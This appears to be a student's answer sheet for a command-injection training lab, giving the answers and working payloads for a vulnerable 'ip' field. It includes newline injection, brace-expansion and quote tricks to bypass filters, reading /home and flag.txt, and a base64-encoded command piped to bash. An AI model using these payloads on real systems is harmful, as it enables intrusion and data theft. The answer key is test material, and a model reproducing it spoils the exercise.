Questions

Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?

Line 17

Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?

Answer: |

Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?

Ans: ip=127.0.0.1%0a{ls,-la}, 1613

Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?

%0a{ls,-la,${PATH:0:1},${IFS}home} shows ls -la / but it does not show whats inside /home.

lets try and modify the payload further.

ip=127.0.0.1%0a{ls,-la,${PATH:0:1}home}

Ans:1nj3c70r

Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found.

ip=127.0.0.1%0a{c'a't,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt} can be interpreted as ip=127.0.0.1\n cat /home/1nj3c70r/flag.txt

cat has ' in between is to bypass the filter.

cat /home/1nj3c70r/flag.txt is in the { } is to bypass filter as well.

Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1

echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64

We can do cat /flag.txt or cat /etc/passwd in the base64 code but to answer the questions, below is the command injection we want to execute after the IP address field.

bash<<<$(base64 -d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)

So the final payload is, ip=127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)